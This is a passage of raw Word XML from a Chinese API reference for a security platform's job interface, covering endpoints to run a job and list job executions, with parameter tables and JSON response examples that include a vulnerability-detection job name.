            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2DC2C861" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="13791D84" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7903C7A8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>taskType</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="210F7C95" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>tinyint</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6A2B200A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>任务类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6A4C51F8" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="286E0A6D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>taskId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2092B74A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="378E547F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>任务id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="683A8647" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0CF17C07" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>params</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="272FBF5C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>TaskParam</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6DCCE358" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>与创建的时候传递的参数一致</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="283E2D6F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="201" w:name="立即执行某个作业"/>
      <w:bookmarkEnd w:id="200"/>
      <w:r>
        <w:t>立即执行某个作业</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7461B46B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63535671" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>POST /external/api/fastjob/job/execute/{id}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F282AB5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>请求参数：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="630"/>
        <w:gridCol w:w="777"/>
        <w:gridCol w:w="840"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="2999CD3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2FB2CAF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="48EE01A0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6DC13EF9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="3E0CDD61" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0C62B371" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="418A9E36" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7DE4653D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>作业id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0E95B4C6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2044BDF0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>POST /external/api/fastjob/job/execute/5d1c76e067657c0a04cfbf67</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="083767E6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50998F83" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">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d61c323e46813eb98f513"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E236DD5"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837"/>
        <w:gridCol w:w="777"/>
        <w:gridCol w:w="1627"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="2C68FD8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03944AB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段名</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="500C281D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7D6BD21F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="4E23296C" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="52D3E1AA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="25850FA0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7CB530EF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>作业执行记录id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="35F903F4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="202" w:name="查看作业执行列表"/>
      <w:bookmarkEnd w:id="201"/>
      <w:r>
        <w:t>查看作业执行列表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D197AD0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="458948DE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>GET /external/api/fastjob/job/execute</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EBD352E"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702"/>
        <w:gridCol w:w="1435"/>
        <w:gridCol w:w="6945"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="4B3A8F4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BADF8F4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5C34A146" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6A1BE55A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="4FFBBB8D" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="20967720" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>osType</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4764B72E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>tinyint</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7DD42E28" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>系统类别(必填)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="29CFAF2B" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0756F65B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>jobName</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2E35A447" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5AEBF981" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>作业名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="7457181B" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1F7FCE47" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>startDateRange</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0519427A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>map</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3517FD24" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>作业执行起始时间范围</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="1F205997" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4C44AF55" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>durations</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="02071C89" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>List&lt;Integer&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="65DE6046" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>执行时间范围 0/1/2/3/4/5, 1分钟内/1~3分钟内/3~5分钟内/5~10分钟内/10~30分钟内/超出30分钟</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="5343AE5A" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3719BF83" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>statuses</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="71D4CD44" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>List&lt;Integer&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0BD3B140" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>扫描状态 1.准备执行, 2.正在执行, 3.执行成功, 4.执行失败</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6684A52F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>排序字段：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1104"/>
        <w:gridCol w:w="1004"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="628D14F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9C1EAE6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6F5D1F77" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="2C126E55" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="596AF205" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>startTime</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="76D387EC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>执行时间</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="2E11C0C7" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5A1F879F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="06A2C950" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>执行名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="19CE95CA" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7A1D6D67" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>duration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="55FB03D3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>执行时间</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="7934CA17" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="25551B95" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4D0FFB9E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>执行结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7939D18F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A2948DF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>/external/api/fastjob/job/execute?osType=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CDD5878" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3297DC0C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"row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da35425d89101991a6e32"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"jobId"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"5d1da35425d89101991a6e3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文件完整性校验-20190704145709"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"taskRecordId"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"5d1da35425d89101991a6e33"</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ou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gent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osTags"</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lastRenderedPageBreak/>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"cronEn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cron"</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startTime"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"2019-07-04 14:57:24"</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DecValTok"/>
        </w:rPr>
        <w:t>3</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36b6825d8915db28cabc0"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"jobId"</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eblogic反序列化漏洞(CVE-2018-2628)检测-20190625181834"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"taskRecordId"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
